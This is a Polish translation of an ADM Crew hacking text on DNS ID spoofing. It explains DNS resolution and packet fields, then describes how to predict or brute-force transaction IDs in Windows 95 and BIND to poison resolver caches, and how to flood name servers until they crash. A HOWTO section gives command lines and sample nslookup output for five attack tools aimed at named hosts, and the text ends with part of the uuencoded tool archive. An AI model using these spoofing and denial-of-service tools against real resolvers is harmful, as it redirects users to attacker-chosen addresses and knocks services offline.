
                      ___      ______      _       _
                    /     \   |   _   \   |  \   /  |
                   |  / \  |  |  |  \  |  |   \_/   |
                   | |___| |  |  |_ /  |  |   \_/   |
..oO  THE          |  ---  |  |       /   |  |   |  |         CreW Oo..
                   '''   '''   '''''''    ''''   ''''        
                               prezentuje

                            DNS ID Hacking                    
                          (a nawet wiecej !!)
                      w kolorze i z obrazkami ;))
                  (ale za to bez polskich literek ;-) )

Tlumaczenie: sh4d0w (5h4d0w@iname.com)

                    

--[1]-- Co to jest DNS ID Hacking?

w00w00!
Czesc! Pewnie zastanawiacie sie co to takiego jest ten DNS ID Hacking
(albo Spoofing jak kto woli). DNS ID Hacking nie jest tak po prostu zwykla
metoda hackingu / spoofingu. Wszystko opiera sie na slabosci protokolu DNS.
Mowiac wprost DNS ID hack/spoof jest bardzo skuteczny i efektywny poniewaz nie
istnieje generacja demonow DNS, ktore sa w stanie sie przed nim bronic (chodzi
tu takze o WinNT!)


--[1.1]-- Wyjasnienie mechanizmu dzialania protokolu DNS

Najpierw musicie wiedziec jak dziala DNS. Wyjasnione to beda tylko
najwazniejsze fakty ze specyfikacji tego protokolu. Zeby zrozumiec to w pelni
bedziemy musieli przesledzic droge pakietu z zapytaniem DNS od A do Z!

1: Klient (maciek.zet.com.pl) wysyla zadanie 'rozszyfrowania' domeny
"www.cafe.silesia.pl". Zeby  znalezc kryjacy sie pod ta nazwa adres IP
maciek.zet.com.pl uzywa dns.zet.com.pl jako serwera DNS. Popatrzmy na
zalaczony obrazek: 

/-------------------------------------\
| 195.117.244.6  =  maciek.zet.com.pl |
| 195.117.244.12  =  dns.zet.com.pl   |
| format:                             |
| ADRES_IP:PORT->ADRES_IP:PORT        |
| np:                                 |
|195.117.244.6:1999->195.117.244.12:53|
    
\-------------------------------------/
...
  gethosbyname("www.cafe.silesia.pl");
...

[maciek.zet.com.pl]                             [dns.zet.com.pl] 
195.117.244.6:1999 --->[?www.cafe.silesia.pl]------> 195.117.244.12:53

Tu widzimy nasze polecenie 'rozszyfrowania' nazwy idace z portu 1999 klienta,
do portu 53 serwera dns.

[UWAGA: DNS jest zawsze na porcie 53]

Teraz, gdy dns.zet.com.pl otrzymalo polecenie od maciek.zet.com.pl, moze
zaczac probowac 'odkryc' jaki IP kryje sie pod nazwa www.cafe.silesia.pl
Popatrzmy ...
 
[dns.zet.com.pl]                                     [ns.internic.net]
195.117.244.12:53 -------->[dns?www.cafe.silesia.pl]----> 198.41.0.4:53


dns.zet.com.pl pyta ns.internic.net, ktora maszyna jest 'najwyzszym' (mozna
powiedziec najblizszym) serwerem nazw (=serwerem dns) dla www.cafe.silesia.pl.
Jesli ns.internic.net nie zna IP tego serwera to przesyla nam adres serwera
nazw, ktory ma autoryzacje w domenie '.pl' . 

[UWAGA: 
pytamy internic bo moze on miec juz to zadanie w swoim cache
(tzn ktos o to pytal niedawno i jeszcze nie otrzymal odpowiedzi lub otrzymal
ja a bylo to w na tyle niedlugim odstepie czasu ze internic potrafi udzielic
nam automatycznie tej samej)]
   
[ns.internic.net]                                           [dns.zet.com.pl]
198.41.0.4:53 ------>[IP dnsa dla .pl to 192.36.125.2]------> 195.117.244.12:53

Tu mozemy zobaczyc ze ns.internic.net odpowiedzialo dns.zet.com.pl (ktory jest
serwerem nazw majacym autoryzacje w domenie zet.com.pl) ze serwer nazw majacy
autoryzacje w domenie '.pl' ma IP 192.36.125.2 [nazwijmy go ns.dla.pl]. Teraz
nasz dns.zet.com.pl zapyta ns.dla.pl o adres IP www.cafe.silesia.pl, ale
zapytany oczywiscie nie moze udzielic informacji na zadany temat wiec przesyla
zadanie do dnsa, ktory posiada autoryzacje w domenie silesia.pl.


[dns.zet.com.pl]                                        [ns.dla.pl]
195.117.244.12:53 ------>[?www.cafe.silesia.pl]-----> 192.36.125.2:53

odpowiedz z ns.dla.pl

[ns.dla.pl]                                                   [dns.zet.com.pl]
192.36.125.2:53 ------>[ns dla silesia.pl to 157.158.1.3]---> 195.117.244.12:53

Teraz mamy adres maszyny majacej autoryzacje w "silesia.pl" (nazwijmy ja
ns1.silesia.pl) . Wysylamy do niej to samo zadanie ...

[dns.zet.com.pl]                                  [ns1.silesia.pl] 
195.117.244.12:53 ------>[?www.cafe.silesia.pl]-----> 157.158.1.3:53 

Lecz tu sytuacja sie powtarza (!)

[ns1.silesia.pl]                                              
157.158.1.3:53 ------>  [ns dla cafe.silesia.pl             [dns.zet.com.pl]
                         to 212.160.152.240]       ---->   195.117.244.12:53 

No wreszcie! Teraz wiemy jaki adres IP ma autoryzacje w domenie
'cafe.silesia.pl' [ niech nazywa sie dns.cafe.silesia.pl]. Teraz mozemy
wreszcie zapytac jaki jest IP maszyny www [ czyli www.cafe.silesia.pl ;-)]

[dns.zet.com.pl]                                     [dns.cafe.silesia.pl]]
195.117.244.12:53 ------>[?www.cafe.silesia.pl]---->   212.160.152.240:53

I nareszcie mamy odpowiedz!!

[dns.cafe.silesia.pl]                                           
212.160.152.240:53 ------->[www.cafe.silesia.pl              [dns.zet.com.pl]
                            == 212.160.152.238]    ---->    195.117.244.12:53
 
  

Super, odpowiedz jest wiec mozemy ja skierowac do naszego klienta czyli
maciek.zet.com.pl

[dns.zet.com.pl]                                             
195.117.244.12:53 ------->[www.cafe.silesia.pl 
                             == 212.160.152.238]   ----> [maciek.zet.com.pl]                                                           
                                                          195.117.244.6:1999
 

Hehe teraz maciek.zet.com.pl zna IP www.cafe.silesia.pl :)

A teraz wyobrazmy sobie ze chcemy poznac nazwe maszyny majac jej IP. Zeby to
zrobic, trzeba pokombinowac troche inaczej bo IP musi byc przetransformowane:

np.
100.20.40.3 stanie sie 3.40.20.100.in-addr.arpa

UWAGA!! Ta metoda stosuje sie tylko do zadan 'odkrywania' adresu IP (tzw.
reverse DNS)

Sprobujmy rozpatrzyc to w praktyce: gdy bierzemy IP www.cafe.silesia.pl
(212.160.152.238 albo "238.152.160.212.in-addr.arpa" po przetlumaczeniu na
zrozumialy dla DNS format)

...
   gethostbyaddr("212.160.152.238");
...

[maciek.zet.com.pl]                                       
195.117.244.6:2600 ----->[?238.152.160.212.in-addr.arpa]
                                                     ----->[dns.zet.com.pl] 
                                                           195.117.244.12:53
 

Wyslalismy zadanie do naszego 'najblizszego' serwera nazw (dns.zet.com.pl)

[dns.zet.com.pl]                                          
195.117.244.12:53 ----->[?238.152.160.212.in-addr.arpa]
                                                   ------>[ns.internic.net]  
                                                           198.41.0.4:53 
 


ns.internic.net wysle nam IP maszyny, ktora ma autoryzacje w 212.in-addr.arpa

.

[ns.internic.net]                                          
198.41.0.4:53 ----->[DNS dla 212.in-addr.arpa 
                            to 192.36.125.2]   ---->   [dns.zet.com.pl]  
                                                       195.117.244.12:53
 
 

Teraz dns.zet.com.pl zada to samo pytanie pod wskazany wczesniej adres
(czyli 192.36.125.2 ;-))

[dns.zet.com.pl]                                                [ns.dla.pl]
195.117.244.12:53 ----->[?238.152.160.212.in-addr.arpa]------> 192.36.125.2:53

i tak dalej ...
W praktyce mechanizm jest prawie taki sam jak w przypadku 'rozszyfrowywania'
nazwy (domeny)

Mam nadzieje ze zrozumieliscie jak dziala DNS. Teraz przyjrzymy sie blizej
formatowi pakietow DNS

--[1.2]-- pakiet DNS 

Tak wyglada pakiet DNS:

    +---------------------------+---------------------------+
    |     ID (o to tu chodzi :) |  flagi                    |
    +---------------------------+---------------------------+
    |   liczba pytan            | liczba odpowiedzi         |
    +---------------------------+---------------------------+
    |   numer certyfikujacy RR  |  numer uzupelniajacy RR   |
    +---------------------------+---------------------------+
    |                                                       |
    \                                                       \
    \                        PYTANIE                        \
    |                                                       |
    +-------------------------------------------------------+
    |                                                       |
    \                                                       \
    \                       ODPOWIEDZ                       \
    |                                                       |
    +-------------------------------------------------------+
    |                                                       |
    \                                                       \
    \                  Reszta itp..    bez znaczenia        \
    |                                                       |
    +-------------------------------------------------------+

--[1.3]--  Struktura pakietu DNS


__ID__

ID pozwala nam zidentyfikowac poszczegolne pakiety DNS. Poniewaz wymiana
informacji miedzy serwerami nazw nastepuje z portu 53 do portu 53, co wiecej w
tym samym czasie moze nadejsc do odbiorcy wiecej niz jedno zadanie, wiec ID
jest jedynym sposobem pozwalajacym rozroznic pomiedzy roznymi zadaniami DNS.
Wiecej powiemy o tym pozniej ...

__flagi__

Ta sekcja jest podzielona na kilka mniejszych grup:

       4 bity                    3 bity (zawsze 0)
       |                         |
       |                         |
[QR | opcode | AA| TC| RD| RA | zero | rcode ]
                                         |
 |             |___|___|___|             |______ 4 bity
 |                     |
 |                     |_ 1 bit
1 bit

QR     = Jesli bit QR = 0, znaczy to, ze pakiet zawiera pytanie, jesli jest
         inaczej jest on odpowiedzia.   

opcode = Wartosc wynosi 0 dla normalnego zadania, 1 dla zapasowego, 2 dla
         istniejacego (nie musimy znac tych wszystkich trybow).  

AA     = Jesli rowna sie 1, mowi nam to, ze serwer nazw ma dla nas ostateczna
         odpowiedz. 


TC     = Bez znaczenia.

RD     = Jesli ta flaga wynosi 1, oznacza to ze chodzi o "Przekazanie
         Zadania", np gdy maciek.zet.com.pl prosi dns.zet.com.pl o
         'rozszyfrowanie' nazwy (czyli podanie IP maszyny o tej nazwie),
         flaga mowi DNSowi zeby owo zadanie 'wzial na siebie'. 


RA     = Jesli jest ustawione na 1, odbiorca wnioskuje ze przekazanie jest
         mozliwe. Bit rowna sie 1 w odpowiedzi od serwera nazw, gdy 
         akceptuje on 'przekazanie'.
 
Zero   = Tutaj sa trzy zera...

rcode  = Zawiera zwrotne komunikaty o bledach zwiazanych z zapytaniem
         skierowanym do DNSa, 0 znaczy "nie ma bledu", 3 znaczy "blad nazwy"

Ostatnie 2 flagi nie maja dla nas zadnego znaczenia.

ZAPYTANIE DNS :

Taki jest format zapytania DNS :

+-----------------------------------------------------------------------+
|                              nazwa                                    |
+-----------------------------------------------------------------------+
|       rodzaj zapytania         |          typ zapytania (2)           |
+--------------------------------+--------------------------------------+

Struktura nazwy wyglada tak:

przyklad:
www.cafe.silesia.pl bedzie: [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0] 
w przypadku adresu IP bedzie tak samo :)

44.33.88.123.in-addr.arpa bedzie:
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]
[UWAGA]: istnieje format kompresji, ale nie bedziemy go uzywac.


rodzaj zapytania:

 Tutaj sa wartosci, ktorych bedziemy uzywac najczesciej:
 [UWAGA]: Istnieje ponad 20 roznych wartosci (!) a ja mam dosc pisania :))

  nazwa  wartosc
   A    |   1    | Adres IP           ( chcemy IP na podstawie nazwy)   
   PTR  |   12   | Wskaznik (Pointer)    ( chcemy nazwe, majac IP )
 
 

typ zapytania:

 Wartosci sa takie same jak w przypadku rodzaju zapytania.
 (nie wiem, czy jest to prawda, ale celem nie jest nauczenie was protokolu
  DNS od A do Z, jesli chcecie bardziej zglebic ten temat powinniscie zapoznac
  sie z RFC od 1033 do 1035 i 1037, tutaj celem jest ogolna wiedza do
  zastosowania w praktyce!!).



ODPOWIEDZ DNS:

Odpowiedz ma format, ktory nazywamy RR. No ale niewazne :)

Tak wyglada format odpowiedzi (czyli RR)

+------------------------------------------------------------------------+
|      nazwa domeny                                                      |
+------------------------------------------------------------------------+
|   typ                            |    klasa                            |
+----------------------------------+-------------------------------------+
|                           TTL (time to live - czas zycia)              |
+------------------------------------------------------------------------+
 
| dlugosc dostepnej informacji    |                                      |
|---------------------------------+                                      |  
|
                   dostepna informacja                                  |
 
+-------------------------------------------------------------------------

 
nazwa domeny:

Nazwa domeny w formacie takim samym jak w przypadku czesci pytania
'rozszyfrowania' domeny www.cafe.silesia.pl. Flaga "nazwa domeny"
bedzie zatem zawierac [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0]  

typ:

Ta flaga jest taka sama jak w przypadku 'typu zapytania' w czesci "PYTANIE"
pakietu.

klasa:
Flaga klasy rowna sie 1 w przypadku informacji internetowej.

czas zycia:
Ta flaga pokazuje (w sekundach) czas 'zycia' informacji w cache (kaszu)
serwera nazw.

dlugosc dostepnej informacji: 
Jak sama nazwa wskazuje. Podawana w bajtach. (np jesli ta flaga ma wartosc 4
to znaczy, ze dostepna informacja zawiera sie w 4 bajtach)


dostepna informacja:  
W naszym przypadku (zapytanie o IP podanej domeny - czyli typ 1[A]) serwer
nazw podaje w tym miejscu IP

Pokaze wam pewnien przyklad, ktory wytlumaczy to lepiej:

 
Oto, co dzieje sie, gdy dns.zet.com.pl pyta dns.cafe.silesia.pl o adres IP
maszyny o domenie www.cafe.silesia.pl 


dns.zet.com.pl:53 ---> [?www.cafe.silesia.pl] ----> dns.cafe.silesia.pl:53 

+---------------------------------+--------------------------------------+
|   ID = 1999                     | QR = 0 opcode = 0 RD = 1             |
+---------------------------------+--------------------------------------+
| liczba pytan = htons(1)         | liczba odpowiedzi = 0                |
+---------------------------------+--------------------------------------+
| numer certyfikujacy RR = 0      | numer uzupelniajacy RR = 0           |
+---------------------------------+--------------------------------------+
<czesc "PYTANIE">
+------------------------------------------------------------------------+
|   nazwa = [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0]                  |
+------------------------------------------------------------------------+
|  rodzaj zapytania = htons(1)    |      typ zapytania = htons(1)        |
+---------------------------------+--------------------------------------+

Tak to wyglada w przypadku pytania.

Teraz przyjrzyjmy sie odpowiedzi od dns.cafe.silesia.pl

dns.cafe.silesia.pl:53 -->[IP www.cafe.silesia.pl
                              to 212.160.152.238] -->      dns.zet.com.pl:53
 

+---------------------------------+-----------------------------------------+
|   ID = 1999                     | QR=1 opcode=0 RD=1  AA =1  RA=1         |
+---------------------------------+-----------------------------------------+
| liczba pytan = htons(1)         | liczba odpowiedzi = htons(1)            |
+---------------------------------+-----------------------------------------+
| numer certyfikujacy RR = 0      | numer uzupelniajacy RR = 0              |
+---------------------------------+-----------------------------------------+
+---------------------------------------------------------------------------+
|   nazwa = [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0]                     |
+---------------------------------------------------------------------------+
|   rodzaj zapytania = htons(1)   |      typ zapytania = htons(1)           |
+---------------------------------------------------------------------------+
+---------------------------------------------------------------------------+
|   name domeny = [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0]               |
+---------------------------------------------------------------------------+
|       typ         = htons(1)    |      klasa    = htons(1)                |
+---------------------------------------------------------------------------+
|                       czas zycia = 999999                                 |
+---------------------------------------------------------------------------+
|dlugosc dost. inf. = htons(4)|dost. informacja=inet_addr("212.160.152.238")|
+---------------------------------------------------------------------------+

Yah! To wszystko na dzisiaj :))
 
Przeanalizujmy:
W odpowiedzi QR = 1 bo jest to odpowiedz :)
AA = 1 bo serwer nazw ma autoryzacje w swojej domenie
RA = 1 bo przekazanie bylo i jest mozliwe

Doobrze =) Mam nadzieje, ze zrozumieliscie bo bedzie tego potrzebowali do
kolejnych rzeczy 

--[2.0]-- DNS ID hack/spoof

Teraz przyszedl czas zeby wytlumaczyc jasno co to jest DNS ID hacking/spoofing.
Jak tlumaczylem wczesniej, dla demona DNS jedynym sposobem odroznienia
poszczegolnych pytan/odpowiedzi od siebie jest flaga ID pakietu. Popatrzcie na
ten przyklad:


dns.zet.com.pl:53 ----->[?www.cafe.silesia.pl] ------> dns.cafe.silesia.pl:53

Wiec musisz tylko spoofnac IP dns.cafe.silesia.pl i przeslac odpowiednia
spreparowana informacje przed dns.cafe.silesia.pl do dns.zet.com.pl!
 

dns.zet.com.pl <------- . . . . . . . . . . .  dns.cafe.silesia.pl 
                   |
                   |<--[IP www.cafe.silesia.pl to 1.2.3.4]<--  heh.chakier.org

 
 
Ale w praktyce musisz zgadnac dobre ID :). Jesli jestes w LANie z
'oszukiwanym' serwerem mozesz snifnac (podsluchac) to ID i odpowiedziec przed
wlasciwym serwerem nazw (w Sieci Lokalnej jest to dosc proste :) )

Jesli chcesz to zrobic zdalnie to nie masz zbyt wielkiego wyboru. Mozesz
zastosowac tylko 4 podstawowe metody:

1.) Losowo przetestowac wszystkie prawdopodobne wartosci flagi ID. Musisz
    odpowiedziec przed dnsem! (tutaj dns.cafe.silesia.pl). Ta metoda jest
    przestarzala chyba ze baardzo chcesz znac ID ... albo jesli masz inny
    argument na okolicznosc jej stosowania

2.) Wyslac troche zapytan DNS (200 albo 300) zeby zwiekszyc szanse
    pozniejszego trafienia na dobre ID

3.) Zfloodowac (zalac zadaniami) DNS zeby przestal wykonywac swoje funkcje.
    Serwer nazw padnie i pokaze nastepujacy komunikat! 

    >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT
     teraz demon named jest zepsuty :) (przynajmniej na jakis czas)

4.) Albo mozesz skorzystac z dziury w BIND znalezionej przez SNI (Secure
    Networks, Inc.) - chodzi o przewidywanie ID (za chwile to omowimy)

 
#####################   Dziura w Windows ID   ###########################

Znalazlem powazna dziure w Windows 95 [tez mi nowosc ;-> - przyp. sh4d0w]
(nie testowalem tego na WinNT), wyobrazmy sobie serwer nazw na Win 95.
Wartosc ID Windowsa jest bardzo latwo przewidziec bo domyslnie wynosi ona "1"
:))), albo "2" w przypadku drugiego zapytania w tym samym czasie.


######################## Dziura w BINDzie ##############################

Zostala ona odkryta przez SNI jak wczesniej wspomnialem. W praktyce wartosc
flagi ID DNSa mozna dosc latwo przewidziec - trzeba tylko 'podejsc' serwer
zeby osiagnac swoj cel. Pozwolcie, ze wytlumacze ...

DNS uzywa losowej wartosci ID na poczatku ale potem (dla nastepnych zadan) juz
tylko ja zwieksza ... =)))

Latwo jest to wykorzystac.
Tu jest sposob:


1. Trzeba miec mozliwosc podsluchania wiadomosci przychodzacych do jakiegos
   DNSa (w naszym przykladzie dns.olympus.com.pl).

2. Zadasz od hermes.sgh.waw.pl zeby 'rozszyfrowal' (costam).olympus.com.pl.
   hermes.sgh.waw.pl przekazuje zadanie do dns.olympus.com.pl


 hermes.sgh.waw.pl ---> [?(cos).olympus.com.pl 
                                     ID = 444] --->   dns.olympus.com.pl 
 

3. Teraz znasz ID wiadomosci od hermes.sgh.waw.pl i wiesz mniej wiecej w
   jakiego przedzialu liczbowego mozna uzyc (tutaj ID = 444).

4. Teraz ty skieruj do hermesa swoje zapytanie - np. o www.microsoft.com
   
   (ty) ---> [?www.microsoft.com] ---> hermes.sgh.waw.pl

   hermes.sgh.waw.pl --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com
     
5. Zasyp serwer nazw hermes.sgh.waw.pl wiadomosciami o ID = 444 i wiekszym.

ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=444]--> hermes.sgh.waw.pl
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=445]--> hermes.sgh.waw.pl
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=446]--> hermes.sgh.waw.pl
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=447]--> hermes.sgh.waw.pl
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=448]--> hermes.sgh.waw.pl
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=449]--> hermes.sgh.waw.pl
 


Oczywiscie nie mamy r00ta na ns.microsoft.com - spoofujemy tylko jego adres.
Teraz wiecie, ze wartosci ID DNSow sa przewindywalne i wylacznie rosna.
Zasypujemy hermesa spreparowanymi wiadomosciami i ID 444+ ;)

*** po to wlasnie jest ADMsnOOfID. 


Jest jeszcze jedna droga zeby wykorzystac ta dziure - nawet bez roota na
jakims DNSie.

Mechanizm jest prosty. Oto wytlumaczenie

Wysylamy hermesowi zadanie odkrycia IP *.olympus.com.pl


(ty) ----------[?(cos).olympus.com.pl] -------> hermes.sgh.waw.pl

Oczywiscie hermes przesyla zadanie do dns.olympus.com.pl (przypomne ze w tym
przykladzie nie mamy tam roota ani nie jestesmy w stanie 'podsluchac' ID)
.
Nic nowego, ale odtad zaczyna byc ciekawie.

Od tego momentu zasypujemy hermes.sgh.waw.pl spoofowanymi odpowiedziami (z IP
dns.olympus.com.pl) z flaga ID od 100 do 110...


(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=100] --> hermes
(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=101] --> hermes 
(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=102] --> hermes 
(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=103] --> hermes 
.....

Po tym pytamy hermesa jakie (costam).olympus.com.pl ma IP.

Jesli hermes.sgh.waw.pl da nam IP (costam).olympus.com.pl znaczy to, ze
znalezlismy dobre ID :) W innym przypadku musimy powtarzac ataki do chwili
znalezienia wlasciwego ID. Trwa to troche dlugo ale daje efekty. I nic nie
zabrania ci testowac tego na kumplach ;)

Tak dziala ADMnOg00d ;)

-------------------------------



########################################################################## 

Tu znajdziecie 5 programow
ADNdnsfuckr - bardzo prosty atak DoS - pozwala zablokowac DNSa 
ADMsniffID  - posnifuj w LANie i odpowiedz przed wlasciwym NSem
ADMsnOOfID  - DNS ID spoofer (musisz byc rootem na serwerze nazw)
ADMnOg00d   - 'przewidywacz' DNS ID (nie musisz byc rootem na NSie)
ADMkillDNS  - bardzo prosty spoofer DNS

Dobrej zabawy!! :)
UWAGA: Mozecie znalezc zrodla tych programow na ftp.janova.org/pub/ADM.
Musicie u siebie zainstalowac libpcap
 przed jakakolwiek kompilacja programow
ADMID :) [ nie dotyczy nowych linuxow: rh >>5.1 , debian >>2.0 , slackware
>>3.6 - przyp sh4d0w ]


#################### dodatek specjalny - HOWTO ############################

1. ADMdnsfuckr

popularny atak DoS - b. prosty w uzyciu :)

sposob uzycia:

$ ./ADMdnsfuckr <ofiara>

np

$ ./ADMdnsfuckr ns1.pse.pl


2. ADMsniffID

Jest to (jak mowi sam autor) DNS hijacker ;). Oczywiscie potrzeba roota. Do
uzycia tylko w LANie (tzn atakowany serwer nazw jest w tej samej sieci
lokalnej co ty)

# ./ADMsniffID <interfejs sieciowy> <spoofowane IP> <spoofowana domena> [ typ:
   1 lub 12 ]

pamietacie?
typ 1 = A
typ 12 = PTR

np.

# ./ADMsniffID eth0 31.3.3.7 hax0rs.from.hackingpl.pl 12
                                                       ^typ PTR

Wiec jesli ktos w sieci zrobi "nslookup <IP> to bedzie mial:

[root]#nslookup  1.2.3.4
Server:  localhost
Address:  127.0.0.1

Name:     hax0rs.from.hackingpl.pl
Address:  1.2.3.4


3: --= ADMsnOOfID =--

1) na poczatek musicie miec roota na serwerze nazw, ktory ma autoryzacje w
 domenie (np shok.janova.org ma autoryzacje w *.janowa.org)

ADMsnOOfID pomoze wam przewidziec ID pakietu DNS (ale musicie miec roota na
dnsie albo mozliwosc snifowania pakietow przychodzacych do niego)

sposob uzycia:

# ./ADMsnOOfID <interfejs sieciowy>  <NS -ofiara> <twoja domena>  <IP twojego
dnsa> <typ (1,12)> <spoofowana nazwa> <spoofowane ip> <ns majacy autoryzacje w
spoofowanej domenie lub obszarze IP>

np:

# ./ADMsnOOfID ppp0 hermes.sgh.waw.pl janova.org shok.janova.org 12 
           jablonovo.to.jest.to 195.117.80.70  ns4.polbox.pl

jesli teraz zapytasz hermesa o 195.117.80.70 bedziesz mial:

[root]#nslookup 195.117.80.70  hermes.sgh.waw.pl
Server:  hermes.sgh.waw.pl
Address:  148.81.200.10

Name:    jablonovo.to.jest.to
Address:  195.117.80.70

[root]#

Uzywamy ns4.polbox.pl bo ma on autoryzacje w 195.117.80.* . Zeby sprawdzic
taka rzecz nalezy zrobic cos takiego:

[root]#host -t NS 80.117.195.in-addr.arpa
80.117.195.in-addr.arpa name server NS.POLBOX.PL
80.117.195.in-addr.arpa name server NS4.POLBOX.PL
80.117.195.in-addr.arpa name server NS1.PSE.PL
[root]#

zeby wiedziec ktory serwer (lub ktore serwery) maja autoryzacje
w powiedzmy *.polbox.pl robimy tak:

[root]#host -t NS polbox.pl
polbox.pl name server ns.polbox.pl
polbox.pl name server ns4.polbox.pl
polbox.pl name server ns1.pse.pl
[root]#

UWAGA: to moze sie zmieniac!!! Mozesz dostac na poczatku ns1 a kiedy wyslesz
drugie zadanie dostajesz ns4.. :)

Hoo, jestem dzis bardzo mily i dam wam jeszcze jeden przyklad ... na spoof
typu 1

# ./ADMsnOOfID ppp0 hermes.sgh.waw.pl janova.org shok.janova.org 1
zul.ibb.waw.pl  31.3.3.7 jozek.ibb.waw.pl 

no wiec..

[root]#nslookup zul.ibb.waw.pl hermes.sgh.waw.pl
Server:  hermes.sgh.waw.pl
Address:  148.81.200.10

Non-authoritative answer:
Name:    zul.ibb.waw.pl
Address:  31.3.3.7

[root]# 

Ok to wszystko o ADMsnOOfID :)


4: ADMnOg00d 

Ttutaj nie potrzebujecie roota na zadnym DNSie ...
Ale i tak musicie miec roota GDZIES (np u siebie w domu ;->)

To brutalny cracker DNS ID !!

sposob uzycia:

# ./ADMnoG00D <twoje ip> <zaufany dns> <zaufana domena> <ip ofiary> <TYP>
<spoofowana domena> <spoofowane ip> <ns.zaufany.do.spoofu> [ID]

np:

# ./ADMnOg00d ppp45.pierdziszewo.tpnet.pl ix.renet.com.pl renet.com.pl
ledum.ibb.waw.pl 12 jestem.wiesniakiem.mow.mi.elvis 212.87.28.144
ns2.renet.com.pl 7000

(zaczynam od ID 7000 bo znam aktualne ID ledum.ibb.waw.pl)

Uzywam ix.renet.com.pl i domeny renet.com.pl tylko po to, zeby znalesc ID
wiec.. Jesli znajdziemy ID mozemy wyslac spoof wlasciwy.

Jesli sie uda to mamy: 

[root@shok root1]#  nslookup 212.87.28.144 ledum.ibb.waw.pl
Server:  ledum.ibb.waw.pl
Address:  212.87.28.200

Name:    jestem.wiesniakiem.mow.mi.elvis
Address:  212.87.28.144

Tak, znowu bede mily i dam wam jeszcze jeden przyklad spoofu typ 1

# ./ADMnOg00d ppp45.pierdziszewo.tpnet.pl ix.renet.com.pl renet.com.pl
ledum.ibb.waw.pl 1 m45t4ch.renet.com.pl 2.6.0.0 ns2.renet.com.pl 7000

pozniej..
# nslookup m45t4ch.renet.com.pl ledum.ibb.waw.pl
...
Server:  ledum.ibb.waw.pl
Address:  212.87.28.200

Non-authoritative answer:
Name:    m45t4ch.renet.com.pl
Address:  2.6.0.0


5: ADMkillDNS

ADMkillDNS to BRUTALNY spoofer ID, najwczesniej napisane przeze mnie narzedzie
do DNS ID spoofingu 

(napisane: Ju 97�)

Zalaczona pomoc jest bardzo kompletna i nie ma potrzeby o tym wiecej mowic

{koniec}

Cya Ppl  

The ADM Crew 


---------------------------- podziekowania -------------------------------

ADM Crew.

Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love
these guys)
Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at
www.secnet.com for finding the vulnerability =)   

/* I'm a w00w00ify'd w00c0w */
/* I'm a w00w00ify'd w00c0w */
/* I'm a w00w00ify'd w00c0w */

--------------------------- podziekowania ---------------------------------

^^^^^^^^^^^^^^^^^^^^^^^^^
[ no comment :-) -sh4d0w ]

begin 644 ADMid-pkg.tar.gz
M'XL(")]OM3<``T%$36ED+7!K9RYT87(`[#QK4]O6MOT:_X;[8<5WTMA8&-G&
M),4Q<]Q`SF%.`A1HSSV79#S"%EC%EEQ)QI`,][??M=9^2I8-:4G:,Q.EQ=)^
M[[77>^V]>[OOUI-I%%W4!]]]J:?ANEN;F_`=0.-%V[5_^7G1:C8!MC;;6^YF
MRVTW,!N?%]^!^\5&9#VS)/5B@.^2D3=<5>Z^_/_09V/MD9Z-TL8:0&_W'3`Z
M!>$E0!S-TB#TX2**12K,AE.X[^&F'FU4`*7_'OH7-(S]HW_L'I_L_^\>=Y,$
M'_WHHI*D\6R00C`=#>.J+OKSKETV6Q3G(,H&X6`\&_KP*DF'050?[623QL%Y
M-FT6!IB<39OXDRB^I32[\FVRD=Y._237)B8GT>#*3Q?3YUY0D!I$@W1<T$CJ
MY0J'?CH\7TA"2*0;09A)+P?3^JAL?2,X**'T>(LF5VYCK01K$(3]P54RF\#Z
M.GW"ZY$OOFWDV@]3/\;!PE$<I=$@&L.%-PG&MS#RO:$?)U!Y#;_@;Q"%U=*C
M(I@<:VD6)L%EZ`\A&45QJD==\8;#V(&Q3_WB,^N+_#5*[W!2$*:4WRE]XL_8
MOT0L\6-.#\?^10I=D9_)U0W-,=LTEJE-4.J"V\GT[(7)'/-%.N<0G)GNX'`6
M@S>^C.(@'4T@2!#Q)].Q[\`L(7KVH-6$\P#;&`QFD]G82Q'T%>REZL#<IU&H
MAA+_MYD?IH$WAL865YE'\3"!-((@=7`,0_!22$<^^.'0P24<#^'<&UQA[V-*
M5NT,O#B^I?H)7,31A&NDT50VFM`L(TX<1S0IF5PO*3Y"/_-1,/:A(D"Y`XTJ
M@(`T4S:"J-9%*-9J'9THBJYWH2G2[C2@8(*=SZ8X`8B&..3;%($37$#H#_PD
M\7"LLE-,DSUVN]2EZ7&M,NL/1BARUJJ5[\5B5'$UK.0Y=/+C$^461N,-)=@$
MG)`@%)PL&"&$$#KZ4PY0X`8M'NP@4+:J4!-?WX-[<X%/M:-Z&`54V31CM5#+
M--'1+%S6%,.2Y37B_1_6,$55>>2MX<!+:7WS8XW]=!:'%0FL3JETA]RFQ"B.
MS*>?(`Y5$B=A4AOR7Q0V<>H,Q5\O]2YC;\(OQ,FK`G[R+Q.*!+@FXG%$XBLQ
M=)7/&A9E"0+COHNSAE86+[8E]$"-,U]5/&KPQ"9*4A"1+*!Q](,0*14YA$P'
M(<VHU6!JI0K!A:GXTC$<2XUDC?HH2)]Z)'+.-MWFYH=.B>!U0ZPC$)*<,,`2
